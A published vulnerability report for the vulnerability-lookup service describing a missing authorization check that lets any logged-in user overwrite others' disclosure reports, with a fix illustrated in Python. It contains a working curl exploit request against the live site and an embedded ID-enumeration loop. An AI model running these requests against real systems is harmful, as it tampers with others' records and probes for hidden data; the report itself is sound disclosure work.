vulnerability-lookup: Overwriting other submitters CVD reports

Disclosure Status: approved

March 31, 2026

April 09, 2026

Description

Finding

The Vulnerability Disclosure endpoint /disclosure/edit/$id does not check authorization for POST requests. This allows any logged-in user to overwrite other submitters' reports.

Reproducibility

I'll be honest, I didn't do a lot of testing here, as this is fundamentally destructive/dangerous and I don't have a test environment. I did some basic testing on vulnerability.circl.lu with my alt account (nyanbinary-2) against this account (nyanbinary) on the previous report with UUID 1bdb4bec-9da1-4c4c-9626-271cba6feef3 / ID 13: I modified the Credit field with my alt account, verified the change in the frontend with my main account, and subsequently changed it back through the frontend.

How to:

curl -v 'https://vulnerability.circl.lu/disclosure/edit/13' \
  --compressed \
  -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
  -H 'Accept-Language: en-US,en;q=0.9' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Origin: https://vulnerability.circl.lu' \
  -H 'Sec-GPC: 1' \
  -H 'Connection: keep-alive' \
  -H 'Referer: https://vulnerability.circl.lu/disclosure/edit/13' \
  -H "Cookie: theme=light; vulnerability-lookup=$COOKIE" \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Sec-Fetch-Dest: document' \
  -H 'Sec-Fetch-Mode: navigate' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-User: ?1' \
  -H 'Priority: u=0, i' \
  --data-raw "csrf_token=$CSRF&reporter_legal_status=$LEGAL_STATUS&title=vulnerability-lookup%3A+Non-critical+information+leak+of+assigned+vulnerability+IDs+in+CVD&description=%23%23%23+Finding%0D%0AThe+%60%2Fdisclosure%2Fedit%2F%24id%60+and+%60%2Fdisclosure%2F%24id%2Fcomments%60+pages+use+the+sequentially+assigned+vulnerability+disclosure+ID+instead+of+the+UUID.+They+also+treat+non-existing+disclosures+%26amp%3B+other+users+disclosure+differently+%28http+status+404%2C+403%29+when+requested+by+a+signed+in+user.+This+allows+signed+in+users+to+obtain+information+on+created+disclosure+tickets+%26amp%3B+track+creation+of+new+tickets.%0D%0A%0D%0A%23%23%23+Reproducibility%0D%0ALoop+over+IDs+%28using+my+alt+account+-+doesn%27t+work+with+an+admin+account%29%3A%0D%0A%60%60%60bash%0D%0Afor+counter+in+%24%28seq+1+30%29%3B+do+curl+%22https%3A%2F%2Fvulnerability.circl.lu%2Fdisclosure%2F%24counter%2Fcomments%22+%5C%0D%0A++--compressed+%5C%0D%0A++-H+%27User-Agent%3A+Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A147.0%29+Gecko%2F20100101+Firefox%2F147.0%27+%5C%0D%0A++-H+%27Accept%3A+text%2Fhtml%2Capplication%2Fxhtml%2Bxml%2Capplication%2Fxml%3Bq%3D0.9%2C*%2F*%3Bq%3D0.8%27+%5C%0D%0A++-H+%27Accept-Language%3A+en-US%2Cen%3Bq%3D0.9%27+%5C%0D%0A++-H+%27Accept-Encoding%3A+gzip%2C+deflate%2C+br%2C+zstd%27+%5C%0D%0A++-H+%27Referer%3A+https%3A%2F%2Fvulnerability.circl.lu%2Fuser%2Fvulnerability_disclosures%27+%5C%0D%0A++-H+%27Sec-GPC%3A+1%27+%5C%0D%0A++-H+%27Connection%3A+keep-alive%27+%5C%0D%0A++-H+%27Cookie%3A+vulnerability-lookup%3D%5Bremoved%5D%3B+theme%3Dlight%27+%5C%0D%0A++-H+%27Upgrade-Insecure-Requests%3A+1%27+%5C%0D%0A++-H+%27Sec-Fetch-Dest%3A+document%27+%5C%0D%0A++-H+%27Sec-Fetch-Mode%3A+navigate%27+%5C%0D%0A++-H+%27Sec-Fetch-Site%3A+same-origin%27+%5C%0D%0A++-H+%27Sec-Fetch-User%3A+%3F1%27+%5C%0D%0A++-H+%27Priority%3A+u%3D0%2C+i%27%5C%0D%0A++-s+-o+%2Fdev%2Fnull+-w+%22%24counter%3A+%25%7Bhttp_code%7D%5Cn%22%3B%0D%0Adone%0D%0A%60%60%60%0D%0A%0D%0AThis+results+in%3A%0D%0A*+Status+403+for+IDs+2%2C+3%2C+11%2C+12+-+the+latter+two+being+disclosure+reports+I+raised+earlier%0D%0A*+Status+404+for+everything+else%0D%0A%0D%0AThis+indicates+2%2C+3%2C+11%2C+12+being+existing+reports%2C+everything+else+never+having+been+raised+or+...+I+assume+deleted%3F%0D%0A%0D%0A%23%23%23+Impact%0D%0AMinor+technical+information+leak+-+this+information+could+be+used+to+only+track+number+%26amp%3B+deletion+of+reports%2C+no+contents.+This+is+highly+unlikely+to+be+an+issue+for+a+CSIRTs+running+such+software%2C+impacted+for+orgs+with+smaller+scope+%28e.g.+vendor+GNAs%29+is+also+unlikely+to+be+significant.%0D%0A%0D%0A%23%23%23+Patches%0D%0ANo.%0D%0A%0D%0A%23%23%23+Workarounds%0D%0ANot+worth+it.%0D%0A%0D%0A%23%23%23+References&vulnerability_id=&affected_products=circl%3Avulnerability-lookup&credits=binary" -o out.html

The missing variables ($COOKIE, $CSRF, $LEGAL_STATUS) can be pulled by an attacker from the frontend shortly before the request (e.g. by opening disclosure/new and extracting the values via the browser dev console).

Please be careful with verifying :giggle:

Impact

Integrity of vulnerability disclosure reports cannot be guaranteed. I did not find a way to read the contents of the previous entry (an authorization check appears to be in place there) for subtle manipulations, so you'd have to overwrite the entire report.
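The pattern behind the Finding and Impact sections above, as an added example that is not part of this report or of the vulnerability-lookup code base: an edit handler that checks ownership only when rendering the form (GET) beside one that checks it for every method. The names Disclosure, edit_vulnerable, edit_fixed and demo are assumptions; the user names and report id are the ones the report names.

```python
"""Added illustration (not vulnerability-lookup's own code): the access-control
pattern behind this finding, modelled without a web framework.  Ownership that is
enforced only on the read path (GET) lets any signed-in user overwrite another
user's report with a POST; the fixed handler authorizes before it branches on the
method.  Names (Disclosure, edit_*, demo) are assumptions for this example."""
from dataclasses import dataclass

class Forbidden(Exception):
    """Signed-in user is not the owner of the report (HTTP 403)."""

@dataclass
class Disclosure:
    id: int
    owner: str      # username of the submitter
    credits: str

def edit_vulnerable(store: dict, user: str, disclosure_id: int, method: str, form=None):
    """Mirrors the reported bug: ownership is checked only when rendering the
    form.  A valid csrf_token in the POST proves the request came from the
    user's own browser, not that the user may touch this particular report."""
    d = store[disclosure_id]                    # KeyError stands in for HTTP 404
    if method == "GET":
        if d.owner != user:
            raise Forbidden(user)
        return {"credits": d.credits}
    d.credits = form.get("credits", d.credits)  # POST: no ownership check at all
    return {"updated": d.id}

def edit_fixed(store: dict, user: str, disclosure_id: int, method: str, form=None):
    """Authorize once, for every method, before any read or write of the row."""
    d = store[disclosure_id]
    if d.owner != user:
        raise Forbidden(user)
    if method == "GET":
        return {"credits": d.credits}
    d.credits = form.get("credits", d.credits)
    return {"updated": d.id}

def demo(handler) -> str:
    """Constructed scenario from the report: the alt account POSTs a new credits
    value to the main account's report.  Returns the stored credits afterwards,
    or 'forbidden' when the handler rejects the write."""
    store = {13: Disclosure(13, "nyanbinary", "original credit")}
    try:
        handler(store, "nyanbinary-2", 13, "POST", {"credits": "overwritten"})
    except Forbidden:
        return "forbidden"
    return store[13].credits
```

The fix is the placement of the ownership check, not an extra CSRF or login check: both handlers already require a signed-in session, which is exactly the precondition the report describes.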

Patches

Nope

Workarounds

Nyet.

References

Details

GCVE-1-2026-0014

circl:vulnerability-lookup

nyanbinary

862